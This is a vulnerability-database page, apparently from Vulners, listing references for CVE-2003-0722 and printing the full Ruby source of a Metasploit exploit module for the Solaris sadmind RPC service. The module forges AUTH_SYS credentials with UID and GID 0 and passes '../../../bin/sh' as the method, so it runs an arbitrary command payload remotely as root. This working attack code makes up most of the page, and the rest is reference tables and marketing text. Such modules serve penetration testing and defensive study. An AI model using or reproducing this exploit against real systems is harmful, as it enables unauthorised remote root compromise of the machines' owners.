| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2003-0722 | 22 Jun 201000:00 | – | circl | |
| CVE-2003-0722 | 17 Sep 200304:00 | – | cve | |
| CVE-2003-0722 | 17 Sep 200304:00 | – | cvelist | |
| Solaris Sadmind - Command Execution (Metasploit) | 22 Jun 201000:00 | – | exploitdb | |
| CVE-2003-0722 | 22 Sep 200304:00 | – | nvd | |
| Solaris sadmind Command Execution | 28 Oct 200900:00 | – | packetstorm | |
| Solaris sadmind AUTH_SYS Credential Remote Command Execution | 19 Sep 200300:00 | – | nessus | |
| Immunity Canvas: SADMIND | 22 Sep 200304:00 | – | canvas | |
| sadmind AUTH_SYS authentication vulnerability | 9 Jan 200600:00 | – | saint | |
| sadmind AUTH_SYS authentication vulnerability | 9 Jan 200600:00 | – | saint |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SunRPC
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris sadmind Command Execution',
'Description' => %q{
This exploit targets a weakness in the default security
settings of the sadmind RPC application. This server is
installed and enabled by default on most versions of the
Solaris operating system.
Vulnerable systems include solaris 2.7, 8, and 9
},
'Author' => [ 'vlad902 <vlad902[at]gmail.com>', 'hdm', 'cazz', 'midnitesnake' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2003-0722'],
['OSVDB', '4585'],
['BID', '8615']
],
'Privileged' => true,
'Platform' => %w{ solaris unix },
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00",
'DisableNops' => true,
'EncoderType' => Msf::Encoder::Type::CmdPosixPerl,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' => [ ['Automatic', { }], ],
'DisclosureDate' => '2003-09-13',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('HOSTNAME', [false, 'Remote hostname', nil]),
OptInt.new('GID', [false, 'GID to emulate', 0]),
OptInt.new('UID', [false, 'UID to emulate', 0])
], self.class
)
end
def exploit
sunrpc_create('udp', 100232, 10)
sunrpc_authunix('localhost', datastore['UID'], datastore['GID'], [])
if !datastore['HOSTNAME']
print_status('attempting to determine hostname')
response = sadmind_request(rand_text_alpha(rand(10) + 1), "true")
if !response
print_error('no response')
return
end
match = /Security exception on host (.*)\. USER/.match(response)
if match
hostname = match.captures[0]
print_status("found hostname: #{hostname}")
else
print_error('unable to determine hostname')
return
end
else
hostname = datastore['HOSTNAME']
end
sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
response = sadmind_request(hostname, payload.encoded)
sunrpc_destroy
if /Security exception on host/.match(response)
print_error('exploit failed')
return
else
print_status('exploit did not give us an error, this is good...')
select(nil,nil,nil,1)
handler
end
end
def sadmind_request(host, command)
header =
Rex::Encoder::XDR.encode(0) * 7 +
Rex::Encoder::XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0,
host, 'system', '../../../bin/sh')
body =
do_int('ADM_FW_VERSION', 1) +
do_string('ADM_LANG', 'C') +
do_string('ADM_REQUESTID', '00009:000000000:0') +
do_string('ADM_CLASS', 'system') +
do_string('ADM_CLASS_VERS', '2.1') +
do_string('ADM_METHOD', '../../../bin/sh') +
do_string('ADM_HOST', host) +
do_string('ADM_CLIENT_HOST', host) +
do_string('ADM_CLIENT_DOMAIN', '') +
do_string('ADM_TIMEOUT_PARMS', 'TTL=0 PTO=20 PCNT=2 PDLY=30') +
do_int('ADM_FENCE', 0) +
do_string('X', '-c') +
do_string('Y', command) +
Rex::Encoder::XDR.encode('netmgt_endofargs')
request = header + Rex::Encoder::XDR.encode(header.length + body.length - 326) + body
ret = sunrpc_call(1, request)
return Rex::Encoder::XDR.decode!(ret, Integer, Integer, String)[2]
end
def do_string(str1, str2)
Rex::Encoder::XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
end
def do_int(str, int)
Rex::Encoder::XDR.encode(str, 3, 4, int, 0, 0)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation